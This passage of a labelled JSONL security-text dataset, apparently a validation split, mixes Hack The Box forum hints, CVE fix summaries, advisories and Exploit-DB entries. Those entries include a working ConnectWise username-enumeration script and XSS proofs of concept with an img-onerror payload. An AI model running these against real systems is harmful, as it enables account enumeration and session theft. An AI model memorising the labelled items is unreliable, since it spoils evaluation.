1.Find where to inject, intercept move request with burp. 2.Look for \" malicious request denied! message in response, that means you are injecting in the correct request . 3. Look for “ error ” in responses, they give valuable info about what is happening when you inject stuff. 4.It is possible to read the flag without uploading flag.txt to /tmp directory or anywhere else, you can read it straight from the Response message in burp repeater. 5.It is not necessary to use sub shells, encoding, reversing words or using case manipulation. 6.I personally injected after from=filename.txt HERE 7.The only techniques I used were “ bypassing blacklisted commands ” , “ bypassing blacklisted characters ” and “ bypassing space filters ”. I solved this challenge with information only from these three modules. 8.I looked and monitored error messages in responses which ultimately led to my success, I was failing because the injection parameter I was using worked only if the first command succeeded, I realized from response that the first command failed “Error while moving: mv: cannot stat 'var/www/html/files/2143214.txt : No such file or directory” and changed my injection parameter(from “Detection” lesson) and immediately was successful. Hope this helped. I spent 4 hours on this and did not stand up from the computer once Good luck!", "source": "hackthebox", "timestamp": "2023-11-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c6fea1c5e760b32cd527", "text": "Hello this is Palak Sharma Well, this topic is too much old but still can be helpful for many peoples. Well, anyone can follow these steps if he is looking to learn about web development. 1. Choose a programming language 2. Read books and tutorials 3. Practice 4. Join online communities 5. Take online courses The above practices will help you to do so. Thanks", "source": "go4expert", "timestamp": "2023-02-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0ea9e2f59a79c4961938", "text": "Withdrawn Advisory: OS Command Injection in effect\n\n[Severity: CRITICAL]\n\n## Withdrawn Advisory\nThis advisory has been withdrawn because the [npm package effect](https://www.npmjs.com/package/effect), for which alerts were issued, does not correspond with https://github.com/Javascipt/effect, the repository with the vulnerable code. https://github.com/Javascipt/effect is not in any [supported ecosystem](https://docs.github.com/en/code-security/security-advisories/working-with-global-security-advisories-from-the-github-advisory-database/about-the-github-advisory-database#github-reviewed-advisories).\n\nAdditionally, the CVE Numbering Authority that issued the CVE for CVE-2020-7624 has updated [their advisory](https://snyk.io/vuln/SNYK-JS-EFFECT-564256) stating that \"This was deemed not a vulnerability.\"\n\n## Original Description\neffect through 1.0.4 is vulnerable to Command Injection. It allows execution of arbitrary command via the options argument.", "source": "github_advisory", "timestamp": "2022-02-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "52fa4b9fa813b4f8fab2", "text": "CVE: CVE-2022-0726\n\n[{'lang': 'en', 'value': 'Improper Authorization in GitHub repository chocobozzz/peertube prior to 4.1.0.'}]\n\nFix commit: Check video privacy when creating comments/rates", "source": "cvefixes", "timestamp": "2022-02-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0b0cf9e1151f5413b319", "text": "Thanks so much for the help @chappyroo . This is essential for step 5 - some of these tasks are awful!", "source": "hackthebox", "timestamp": "2022-10-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1c68f4a17e9fa34e0b20", "text": "CVE: CVE-2022-0772\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository librenms/librenms prior to 22.2.2.'}]\n\nFix commit: Resolved XSS issue from alert rule list modal (#13805)", "source": "cvefixes", "timestamp": "2022-02-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7f7a233ea11bc8fde571", "text": "CVE: CVE-2021-23555\n\n[{'lang': 'en', 'value': 'The package vm2 before 3.9.6 are vulnerable to Sandbox Bypass via direct access to host error objects generated by node internals during generation of a stacktraces, which can lead to execution of arbitrary code on the host machine.'}]\n\nFix commit: Merge pull request #395 from XmiliaH/security-fixes\n\nInternal restructuring and security improvements", "source": "cvefixes", "timestamp": "2022-02-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f1695af4993cd918b518", "text": "@james.clare Look at your --dnsserver argument and think about what it’s doing. Is that the IP you should be querying? Google that IP address and learn about what it is. Then think about where your queries should be going.", "source": "hackthebox", "timestamp": "2023-03-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a4e6ddbc5b6f6699eb6a", "text": "CVE: CVE-2022-0443\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4281: using freed memory with :lopen and :bwipe\n\nProblem: Using freed memory with :lopen and :bwipe.\nSolution: Do not use a wiped out buffer.", "source": "cvefixes", "timestamp": "2022-02-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d770dffe186fb5bdf49c", "text": "Best Wifi Adapter for Linux\n\nHello, can anyone guide which wifi adapter is good for pentesting which supports packet injection like stuff etc, or which one you are using right now?? Came across TP-Link TL-WN722N ! Any thoughts?? Thank You in advance!!", "source": "parrotsec", "timestamp": "2022-12-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a8263218fab4cb059e55", "text": "Well it appears I over complicated this by 1000 times. At least I learned how to process data and modify scripts lol.", "source": "hackthebox", "timestamp": "2022-07-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "300443cc9bde7a0c5a94", "text": "I finally figured it out! Shoutout to olliz0r from the Discord community for the hint!", "source": "hackthebox", "timestamp": "2023-10-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c7b6ed353cb9f43806a8", "text": "`CHECK` fail in `TensorListScatter` and `TensorListScatterV2` in eager mode\n\n[Severity: LOW]\n\n### Impact\nAnother instance of CVE-2022-35991, where `TensorListScatter` and `TensorListScatterV2` crash via non scalar inputs in`element_shape`, was found in eager mode and fixed.\n```python\nimport tensorflow as tf\narg_0=tf.random.uniform(shape=(2, 2, 2), dtype=tf.float16, maxval=None)\narg_1=tf.random.uniform(shape=(2, 2, 2), dtype=tf.int32, maxval=65536)\narg_2=tf.random.uniform(shape=(2, 2, 2), dtype=tf.int32, maxval=65536)\narg_3=''\ntf.raw_ops.TensorListScatter(tensor=arg_0, indices=arg_1, \nelement_shape=arg_2, name=arg_3)\n```\n\n### Patches\nWe have patched the issue in GitHub commit [bf9932fc907aff0e9e8cccf769e8b00d30fd81a1](https://github.com/tensorflow/tensorflow/commit/bf9932fc907aff0e9e8cccf769e8b00d30fd81a1).\n\nThe fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by Pattarakrit Rattankul\n", "source": "github_advisory", "timestamp": "2022-11-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "273174b15f86c003b098", "text": "Engineering work on the project\n\nHi! Would you choose to work on a project with a compensation based on results (extra bonus for achievements and reduced base for failed project)? Taking in account that individual commitment and results will be measured?", "source": "go4expert", "timestamp": "2023-03-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a4339d46cb99982976ec", "text": "PHPJabbers Rental Property Booking 2.0 - Reflected XSS\n\n# Exploit Title: PHPJabbers Rental Property Booking 2.0 - Reflected XSS\n# Exploit Author: CraCkEr\n# Date: 22/07/2023\n# Vendor: PHPJabbers\n# Vendor Homepage: https://www.phpjabbers.com/\n# Software Link: https://www.phpjabbers.com/rental-property-booking-calendar/\n# Version: 2.0\n# Tested on: Windows 10 Pro\n# Impact: Manipulate the content of the site\n# CVE: CVE-2023-4117\n\n\n## Greetings\n\nThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka\nCryptoJob (Twitter) twitter.com/0x0CryptoJob\n\n\n## Description\n\nThe attacker can send to victim a link containing a malicious URL in an email or instant message\ncan perform a wide variety of actions, such as stealing the victim's session token or login credentials\n\n\n\nPath: /index.php\n\nGET parameter 'index' is vulnerable to RXSS\n\nhttps://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=\n\n\n[-] Done", "source": "exploitdb", "timestamp": "2023-08-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2fb0d98356c4f793d9f0", "text": "ConnectWise Control 19.2.24707 - Username Enumeration\n\n# Exploit Title: ConnectWise Control 19.2.24707 - Username Enumeration\n# Date: 17/12/2021\n# Exploit Author: Luca Cuzzolin aka czz78\n# Vendor Homepage: https://www.connectwise.com/\n# Version: vulnerable <= 19.2.24707\n# CVE : CVE-2019-16516\n\n# https://github.com/czz/ScreenConnect-UserEnum\n\nfrom multiprocessing import Process, Queue\nfrom statistics import mean\nfrom urllib3 import exceptions as urlexcept\nimport argparse\nimport math\nimport re\nimport requests\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\nheaders = []\n\ndef header_function(header_line):\n headers.append(header_line)\n\n\ndef process_enum(queue, found_queue, wordlist, url, payload, failstr, verbose, proc_id, stop, proxy):\n try:\n # Payload to dictionary\n payload_dict = {}\n for load in payload:\n split_load = load.split(\":\")\n if split_load[1] != '{USER}':\n payload_dict[split_load[0]] = split_load[1]\n else:\n payload_dict[split_load[0]] = '{USER}'\n\n # Enumeration\n total = len(wordlist)\n for counter, user in enumerate(wordlist):\n user_payload = dict(payload_dict)\n for key, value in user_payload.items():\n if value == '{USER}':\n user_payload[key] = user\n\n dataraw = \"\".join(['%s=%s&' % (key, value) for (key, value) in user_payload.items()])[:-1]\n headers={\"Accept\": \"*/*\" , \"Content-Type\": \"application/x-www-form-urlencoded\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\"}\n\n req = requests.request('POST',url,headers=headers,data=dataraw, proxies=proxies)\n\n x = \"\".join('{}: {}'.format(k, v) for k, v in req.headers.items())\n\n if re.search(r\"{}\".format(failstr), str(x).replace('\\n','').replace('\\r','')):\n queue.put((proc_id, \"FOUND\", user))\n found_queue.put((proc_id, \"FOUND\", user))\n if stop: break\n elif verbose:\n queue.put((proc_id, \"TRIED\", user))\n queue.put((\"PERCENT\", proc_id, (counter/total)*100))\n\n except (urlexcept.NewConnectionError, requests.exceptions.ConnectionError):\n print(\"[ATTENTION] Connection error on process {}! Try lowering the amount of threads with the -c parameter.\".format(proc_id))\n\n\nif __name__ == \"__main__\":\n # Arguments\n parser = argparse.ArgumentParser(description=\"http://example.com/Login user enumeration tool\")\n parser.add_argument(\"url\", help=\"http://example.com/Login\")\n parser.add_argument(\"wordlist\", help=\"username wordlist\")\n parser.add_argument(\"-c\", metavar=\"cnt\", type=int, default=10, help=\"process (thread) count, default 10, too many processes may cause connection problems\")\n parser.add_argument(\"-v\", action=\"store_true\", help=\"verbose mode\")\n parser.add_argument(\"-s\", action=\"store_true\", help=\"stop on first user found\")\n parser.add_argument(\"-p\", metavar=\"proxy\", type=str, help=\"socks4/5 http/https proxy, ex: socks5://127.0.0.1:9050\")\n args = parser.parse_args()\n\n # Arguments to simple variables\n wordlist = args.wordlist\n url = args.url\n payload = ['ctl00%24Main%24userNameBox:{USER}', 'ctl00%24Main%24passwordBox:a', 'ctl00%24Main%24ctl05:Login', '__EVENTTARGET:', '__EVENTARGUMENT:', '__VIEWSTATE:']\n verbose = args.v\n thread_count = args.c\n failstr = \"PasswordInvalid\"\n stop = args.s\n proxy= args.p\n\n print(bcolors.HEADER + \"\"\"\n __ ___ __ ___\n| | |__ |__ |__) |__ |\\ | | | |\\/|\n|__| ___| |___ | \\ |___ | \\| |__| | |\n\nScreenConnect POC by czz78 :)\n\n \"\"\"+ bcolors.ENDC);\n print(\"URL: \"+url)\n print(\"Payload: \"+str(payload))\n print(\"Fail string: \"+failstr)\n print(\"Wordlist: \"+wordlist)\n if verbose: print(\"Verbose mode\")\n if st", "source": "exploitdb", "timestamp": "2022-01-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c360de1ee14e125b39a2", "text": "CVE: CVE-2022-29193\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.TensorSummaryV2` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Fix tf.raw_ops.TensorSummaryV2 vulnerability with invalid serialized_summary_metadata.\n\nCheck that input is actually a scalar before treating it as such.\n\nPiperOrigin-RevId: 445197183", "source": "cvefixes", "timestamp": "2022-05-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "541d4cff2924a34509d5", "text": "Unchecked Return Value to NULL Pointer Dereference in PDFDocumentHandler.cpp\n\n[Severity: HIGH]\n\n### Impact\nThe package muhammara before 2.6.0; all versions of package hummus are vulnerable to Denial of Service (DoS) when supplied with a maliciously crafted PDF file to be appended to another.\n\n### Patches\nIt has been patched in 2.6.0 for muhammara and not at all for hummus\n\n### Workarounds\nDo not process files from untrusted sources\n\n### References\nPR: https://github.com/julianhille/MuhammaraJS/pull/194\nIssue: https://github.com/julianhille/MuhammaraJS/issues/191\nIssue in hummus: https://github.com/galkahana/HummusJS/issues/293\n\n### Outline differences to https://nvd.nist.gov/vuln/detail/CVE-2022-25892\n\nThe difference is one is in [src/deps/PDFWriter/PDFParser.cpp](https://github.com/julianhille/MuhammaraJS/commit/1890fb555eaf171db79b73fdc3ea543bbd63c002#diff-09ac2c64aeab42b14b2ae7b11a5648314286986f8c8444a5b3739ba7203b1e9b) and the other is [PDFDocumentHandler.cpp](https://github.com/julianhille/MuhammaraJS/pull/194/files#diff-38d338ea4c047fd7dd9a05b5ffe7c964f0fa7e79aff4c307ccee7596457b1ef2) both is a null pointer but for different cases\nThese are totally diffent issues, one is in reading a pdf the other is in appendending a maliciously crafted one. The function calls are different the versions in which they are solved are diffent. ", "source": "github_advisory", "timestamp": "2022-11-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b64f054e72374b1052b8", "text": "CVE: CVE-2022-1432\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Generic in GitHub repository octoprint/octoprint prior to 1.8.0.'}]\n\nFix commit: 🔒️ Fix XSS in webcam stream test", "source": "cvefixes", "timestamp": "2022-05-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2bcf748b15dcf9bdb286", "text": "CVE: CVE-2021-43860\n\n[{'lang': 'en', 'value': 'Flatpak is a Linux application sandboxing and distribution framework. Prior to versions 1.12.3 and 1.10.6, Flatpak doesn\\'t properly validate that the permissions displayed to the user for an app at install time match the actual permissions granted to the app at runtime, in the case that there\\'s a null byte in the metadata file of an app. Therefore apps can grant themselves permissions without the consent of the user. Flatpak shows permissions to the user during install by reading them from the \"xa.metadata\" key in the commit metadata. This cannot contain a null terminator, because it is an untrusted GVariant. Flatpak compares these permissions to the *actual* metadata, from the \"metadata\" file to ensure it wasn\\'t lied to. However, the actual metadata contents are loaded in several places where they are read as simple C-style strings. That means that, if the metadata file includes a null terminator, only the content of the file from *before* the terminator gets compared to xa.metadata. Thus, any permissions that appear in the metadata file after a null terminator are applied at runtime but not shown to the user. So maliciously crafted apps can give themselves hidden permissions. Users who have Flatpaks installed from untrusted sources are at risk in case the Flatpak has a maliciously crafted metadata file, either initially or in an update. This issue is patched in versions 1.12.3 and 1.10.6. As a workaround, users can manually check the permissions of installed apps by checking the metadata file or the xa.metadata key on the commit metadata.'}]\n\nFix commit: Fix metadata file contents after null terminators being ignored\n\nIn particular, if a null terminator is placed inside the metadata file,\nFlatpak will only compare the text *before* it to the value of\nxa.metadata, but the full file will be parsed when permissions are set\nat runtime. This means that any app can include a null terminator in its\npermissions metadata, and Flatpak will only show the user the\npermissions *preceding* the terminator during install, but the\npermissions *after* the terminator are applied at runtime.\n\nFixes GHSA-qpjc-vq3c-572j / CVE-2021-43860\n\nSigned-off-by: Ryan Gonzalez ", "source": "cvefixes", "timestamp": "2022-01-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d26fdc02afda49cbea5e", "text": "I’m scratching my head as well I’ve found the injection point and trying to move the /flag.txt file to the /tmp folder but I’m getting Permission denied message while moving. Exact: “Error while moving: mv: cannot move ‘/flag.txt’ to ‘/tmp/flag.txt’: Permission denied” Strange thing is that I also don’t see any output when I make a obfuscated ls command. If anyone can send help me in the right direction?", "source": "hackthebox", "timestamp": "2022-11-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "316f63bd0227979246a6", "text": "This 2 methods work: netstat -l4 | grep “LISTEN” | grep -v “localhost” | wc -l you could also use a far less simple command → netstat -l | grep “tcp” | grep -v “tcp6” | grep -v “localhost” | wc -l ss -l4 | grep “LISTEN” | grep -v “127.0.0.*” | wc -l I am not sure why is needed since the filter -l should return listening only. If not used, then UDP services will list as well. Any clues why?", "source": "hackthebox", "timestamp": "2022-04-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1647c56607e7514dfdeb", "text": "Hmmm, that’s how it is. Then HINT becomes logical. Confused by their question. Why then do they ask for “brute force attack”. Inspect the login page and perform a bruteforce attack . What is the valid username? Thank you for the right direction of thought", "source": "hackthebox", "timestamp": "2022-07-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3ea9fadf4a23a7a01058", "text": "i believe this should help anyone who needs it.. please do not hesitate to write at me for questions. Getting started | privilege escalation | quick solve Academy Hello, its x69h4ck3r here again. I am gonna make this quick. in other to solve this module, we need to gain access into the target machine via ssh. after that, we gain super user rights on the user2 user then escalate our privilege to root user. please follow my steps, will try to make this as easy as possible. Step 1: connect to target machine via ssh with the credential provided; example; ssh -l user1 -p Step 2: input the given password in the password field. NB: passwo…", "source": "hackthebox", "timestamp": "2022-07-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "36e2299c8ae252156bea", "text": "CVE: CVE-2022-2000\n\n[{'lang': 'en', 'value': 'Out-of-bounds Write in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5063: error for a command may go over the end of IObuff\n\nProblem: Error for a command may go over the end of IObuff.\nSolution: Truncate the message.", "source": "cvefixes", "timestamp": "2022-06-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "10d669c1192451be6249", "text": "Can only agree on the explanation - this particular module look like it skipped the qality control. Your comments made it more clear and easy after but the wording of the assessment is ****", "source": "hackthebox", "timestamp": "2022-11-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "089317a8426d4724af4e", "text": "I found a way to move files, I can even move .php into /tmp folder, however the app is not allowing me to move /flag.txt at all, I can jump back and forward into directories and move index.php at will, but not /flag.txt, it is frustrating", "source": "hackthebox", "timestamp": "2023-08-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "32c90bd7cd38c07e9d34", "text": "Assuming the term you used “hack” is joined with ethically. Parrot OS is designed for anyone to everyone. BTW You can learn hacking from tryhackme.com hackthebox is quite expensive… And seriously man its 2022, go for a Google search for quick results. HAPPY HACKING PAL!", "source": "parrotsec", "timestamp": "2022-11-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "81c53d305bcabc84cd9e", "text": "No I guess I wasn’t clear. I was scanning my network to try and find out what was going on. I was trying to figure out if Spectrums security picked up someone scanning from my IP? I’m still learning so this was more of a question. I didn’t start seeing the “suspicious activity” warnings until I started scanning", "source": "parrotsec", "timestamp": "2022-04-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "abd8d77415825e0e44c9", "text": "I think htb leaves something incomplete to make us solve ourselves and make experience. Anyway in the module there are all command that we need, if we pay attention to “MATCHER OPTIONS:” and “FILTER OPTIONS:” there are 3 options very useful, (-mr -mc -fs ). With -mc 200 we can match only “Status: 200”, with -mr “FLAG No. 1” we can match only the page with this word inside and last -fs skip all noise. ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H \"Host: FUZZ.inlanefreight.htb\" -u http://10.129.76.190 -mr \"FLAG No. 1\" -fs 10918 -mc 200", "source": "hackthebox", "timestamp": "2023-05-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9018030ea754680bd46e", "text": "CVE: CVE-2022-21668\n\n[{'lang': 'en', 'value': \"pipenv is a Python development workflow tool. Starting with version 2018.10.9 and prior to version 2022.1.8, a flaw in pipenv's parsing of requirements files allows an attacker to insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims' systems. If an attacker is able to hide a malicious `--index-url` option in a requirements file that a victim installs with pipenv, the attacker can embed arbitrary malicious code in packages served from their malicious index server that will be executed on the victim's host during installation (remote code execution/RCE). When pip installs from a source distribution, any code in the setup.py is executed by the install process. This issue is patched in version 2022.1.8. The GitHub Security Advisory contains more information about this vulnerability.\"}]\n\nFix commit: Merge pull request from GHSA-qc9x-gjcv-465w\n\nfix TLS validation for requirements.txt", "source": "cvefixes", "timestamp": "2022-01-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "538f331ddd740786dfef", "text": "thanks g i was stuck there a min or 2 but i don’t get why i must subtracted 1 for the first number", "source": "hackthebox", "timestamp": "2023-09-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "add44921fc57e270f4a6", "text": "CVE: CVE-2022-21730\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `FractionalAvgPoolGrad` does not consider cases where the input tensors are invalid allowing an attacker to read from outside of bounds of heap. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Add negative bound check for row and column pooling_sequence in FractionalAvgPoolGrad op to avoid out of bound heap access\n\nPiperOrigin-RevId: 413837346\nChange-Id: I2b86034101df31bee161abcb781755e236c7bccd", "source": "cvefixes", "timestamp": "2022-02-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8368bca8a680c53c6a8c", "text": "Super Socializer 7.13.52 - Reflected XSS\n\n# Exploit Title: Super Socializer 7.13.52 - Reflected XSS\n# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com\n# Date: 2023-06-20\n# Exploit Author: Amirhossein Bahramizadeh\n# Category : Webapps\n# Vendor Homepage: https://wordpress.org/plugins/super-socializer\n# Version: 7.13.52 (REQUIRED)\n# Tested on: Windows/Linux\n# CVE : CVE-2023-2779\nimport requests\n\n# The URL of the vulnerable AJAX endpoint\nurl = \"https://example.com/wp-admin/admin-ajax.php\"\n\n# The vulnerable parameter that is not properly sanitized and escaped\nvulnerable_param = \"\"\n\n# The payload that exploits the vulnerability\npayload = {\"action\": \"the_champ_sharing_count\", \"urls[\" + vulnerable_param + \"]\": \"https://www.google.com\"}\n\n# Send a POST request to the vulnerable endpoint with the payload\nresponse = requests.post(url, data=payload)\n\n# Check if the payload was executed by searching for the injected script tag\nif \"\" in response.text:\n print(\"Vulnerability successfully exploited\")\nelse:\n print(\"Vulnerability not exploitable\")", "source": "exploitdb", "timestamp": "2023-06-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ad6dee4f0cd4ca099fc3", "text": "Cargo not respecting umask when extracting crate archives\n\n[Severity: HIGH]\n\nThe Rust Security Response WG was notified that Cargo did not respect the umask when extracting crate archives on UNIX-like systems. If the user downloaded a crate containing files writeable by any local user, another local user could exploit this to change the source code compiled and executed by the current user.\n\nThis vulnerability has been assigned CVE-2023-38497.\n\n## Overview\n\nIn UNIX-like systems, each file has three sets of permissions: for the user owning the file, for the group owning the file, and for all other local users. The \"[umask][1]\" is configured on most systems to limit those permissions during file creation, removing dangerous ones. For example, the default umask on macOS and most Linux distributions only allow the user owning a file to write to it, preventing the group owning it or other local users from doing the same.\n\nWhen a dependency is downloaded by Cargo, its source code has to be extracted on disk to allow the Rust compiler to read as part of the build. To improve performance, this extraction only happens the first time a dependency is used, caching the pre-extracted files for future invocations.\n\nUnfortunately, it was discovered that Cargo did not respect the umask during extraction, and propagated the permissions stored in the crate archive as-is. If an archive contained files writeable by any user on the system (and the system configuration didn't prevent writes through other security measures), another local user on the system could replace or tweak the source code of a dependency, potentially achieving code execution the next time the project is compiled.\n\n## Affected Versions\n\nAll Rust versions before 1.71.1 on UNIX-like systems (like macOS and Linux) are affected. Note that additional system-dependent security measures configured on the local system might prevent the vulnerability from being exploited.\n\nUsers on Windows and other non-UNIX-like systems are not affected.\n\n## Mitigations\n\nWe recommend all users to update to Rust 1.71.1, which will be released later today, as it fixes the vulnerability by respecting the umask when extracting crate archives. If you build your own toolchain, patches for 1.71.0 source tarballs are [available here][2].\n\nTo prevent existing cached extractions from being exploitable, the Cargo binary included in Rust 1.71.1 or later will purge the caches it tries to access if they were generated by older Cargo versions.\n\nIf you cannot update to Rust 1.71.1, we recommend configuring your system to prevent other local users from accessing the Cargo directory, usually located in `~/.cargo`:\n\n```\nchmod go= ~/.cargo\n```\n\n## Acknowledgments\n\nWe want to thank Addison Crump for responsibly disclosing this to us according to the [Rust security policy][3].\n\nWe also want to thank the members of the Rust project who helped us disclose the vulnerability: Weihang Lo for developing the fix; Eric Huss for reviewing the fix; Pietro Albini for writing this advisory; Pietro Albini, Manish Goregaokar and Josh Stone for coordinating this disclosure; Josh Triplett, Arlo Siemen, Scott Schafer, and Jacob Finkelman for advising during the disclosure.\n\n[1]: https://en.wikipedia.org/wiki/Umask\n[2]: https://github.com/rust-lang/wg-security-response/tree/main/patches/CVE-2023-38497\n[3]: https://www.rust-lang.org/policies/security", "source": "github_advisory", "timestamp": "2023-08-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "08aec5aae0401f1926ca", "text": "CVE: CVE-2021-37517\n\n[{'lang': 'en', 'value': 'An Access Control vulnerability exists in Dolibarr ERP/CRM 13.0.2, fixed version is 14.0.0,in the forgot-password function becuase the application allows email addresses as usernames, which can cause a Denial of Service.'}]\n\nFix commit: Fix Improper Authorization Check reported by Ahsan Aziz.", "source": "cvefixes", "timestamp": "2022-03-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5dd30c89fa154971113c", "text": "io.netty:netty-codec-http2 vulnerable to HTTP/2 Rapid Reset Attack\n\n[Severity: HIGH]\n\nA client might overload the server by issue frequent RST frames. This can cause a massive amount of load on the remote system and so cause a DDOS attack. \n\n### Impact\nThis is a DDOS attack, any http2 server is affected and so you should update as soon as possible.\n\n### Patches\nThis is patched in version 4.1.100.Final.\n\n### Workarounds\nA user can limit the amount of RST frames that are accepted per connection over a timeframe manually using either an own `Http2FrameListener` implementation or an `ChannelInboundHandler` implementation (depending which http2 API is used).\n\n### References\n- https://www.cve.org/CVERecord?id=CVE-2023-44487\n- https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/\n- https://cloud.google.com/blog/products/identity-security/google-cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps/", "source": "github_advisory", "timestamp": "2023-10-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3e4db00124830b37bee8", "text": "Hi I would also like to reply to this question as I also didnt understood what was asked… My understanding was that we had to find out what the EBP address was before we overwrite it with a payload. I think that would reflect the knowledge you have about this topic better. Also the question is very confusing. For the people that are stuck on this question just follow the same steps in the top of the read section and paste the value EBP has after you run it. Maybe for your own understanding try to find out the address of EBP before you over write it! (this is not answer to the question )", "source": "hackthebox", "timestamp": "2023-02-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "aaa19e2c9369cd3c15cc", "text": "Think about it, you installed network-manager, yet asked about netwokmanager and networkmanager, without a hyphen… Once youve installed it, you need to both enable it, and start it… sudo systemctl network-manager enable sudo systemctl network-manager start", "source": "parrotsec", "timestamp": "2023-07-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7fc9a4635ede2624b2c8", "text": "Stuck on Elasticity for several days. Could someone give me an small hint please? Any help will be appreciated.", "source": "hackthebox", "timestamp": "2022-02-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b0380ab705055733361b", "text": "Thanks for the hint of the smallest list. I enumerated zones properly and couldn’t figure out what I was doing wrong. For others reading this, he means start with the smallest list in SecLists/Discovery/DNS/ first, not subdomains-top1million-5000.txt which is what I initially assumed.", "source": "hackthebox", "timestamp": "2022-03-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "fee975461f428f5e2543", "text": "The tools for rooting androids are all on windows why would you need linux for this", "source": "parrotsec", "timestamp": "2023-09-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ea97b9f3995e840eaa9a", "text": "Thanks. I will look that. If you find list of AD Mitre TTP, please write here!", "source": "hackersploit", "timestamp": "2022-04-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "15a0d3baaadd82e33925", "text": "CVE: CVE-2020-28461\n\n[{'lang': 'en', 'value': 'This affects the package js-ini before 1.3.0. If an attacker submits a malicious INI file to an application that parses it with parse , they will pollute the prototype on the application. This can be exploited further depending on the context.'}]\n\nFix commit: refactoring and new functional", "source": "cvefixes", "timestamp": 